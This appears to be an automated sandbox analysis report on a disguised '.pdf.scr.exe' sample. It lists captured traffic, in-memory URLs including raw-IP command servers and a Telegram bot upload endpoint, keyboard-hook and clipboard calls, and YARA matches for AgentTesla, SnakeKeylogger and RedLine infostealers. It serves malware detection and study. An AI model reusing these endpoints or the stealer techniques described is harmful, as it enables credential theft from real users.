Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 05:43:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 05:43:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 28 Nov 2024 05:44:24 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 28 Nov 2024 05:44:24 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: alg.exe, 00000002.00000003.1802330487.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.143/bgeqsgd
Source: alg.exe, 00000002.00000003.1784297308.000000000065C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/cvmmqsiwgd
Source: alg.exe, 00000002.00000003.1705755839.000000000063D000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000007.00000002.1724640773.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1847655008.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1851268257.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1850387943.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 0000001C.00000002.1903481780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: surmit.exe, 00000007.00000002.1724640773.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/=l
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/A
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/a8
Source: surmit.exe, surmit.exe, 0000001C.00000002.1903481780.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 0000001C.00000002.1902809636.0000000000BA4000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/chev
Source: surmit.exe, 00000007.00000002.1724557025.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/hfbsoyybcej
Source: surmit.exe, 00000007.00000002.1724640773.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/hfbsoyybcej&Bu
Source: surmit.exe, 00000007.00000002.1724557025.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/hfbsoyybcejgs
Source: alg.exe, 00000002.00000003.1705620612.000000000065D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1705755839.000000000063D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/hofte
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695070518.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tbqsdcfeojy
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695070518.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tbqsdcfeojyGE
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1694378797.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tbqsdcfeojyg
Source: surmit.exe, 00000019.00000003.1847655008.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1850913885.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1851268257.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/wblsu
Source: surmit.exe, 0000001C.00000002.1903481780.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/chev
Source: alg.exe, 00000002.00000003.1705755839.0000000000637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/hofte
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/tbqsdcfeojy
Source: surmit.exe, 00000019.00000003.1847655008.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1851268257.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/wblsuH
Source: alg.exe, 00000002.00000003.2314035971.0000000000684000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2306012228.0000000000680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.2306696013.0000000000668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/abs/qwhxdc
Source: RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: surmit.exe, 00000007.00000002.1724323245.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000002.00000003.2430159866.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2441577314.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: alg.exe, 00000002.00000003.2442001038.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2430468559.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: alg.exe, 00000002.00000003.1930851668.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: RegSvcs.exe, 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: RegSvcs.exe, 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: alg.exe, 00000002.00000003.2334185349.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000002.00000003.1972367887.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1974645138.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1974075154.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000002.00000003.2334264926.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: alg.exe, 00000002.00000003.2315893021.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1
Source: alg.exe, 00000002.00000003.2315893021.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
Source: powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: alg.exe, 00000002.00000003.2334344927.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000002.00000003.2334344927.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000002.00000003.2316244743.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
Source: alg.exe, 00000002.00000003.2333634133.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: alg.exe, 00000002.00000003.2477947138.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/8

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00456B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00456B0C

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00456D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00456D07

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

0_2_00456B0C

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0041B63C GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_0041B63C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0046F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0046F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 13.0.neworigin.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.36a5570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.2.surmit.exe.4050000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.2.surmit.exe.41a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.36e2790.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 28.2.surmit.exe.49a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000001C.00000002.1909944306.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000019.00000002.1863278760.0000000004050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.1725995787.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1731407084.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403D19
Source: Order SMG 201906 20190816order.pdf.scr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_568dc32f-9
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e6dfe179-7
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1687663598.00000000042ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fc624ccb-9
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1687663598.00000000042ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_58de4281-3
Source: surmit.exe, 00000007.00000002.1722702719.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9cd57576-e
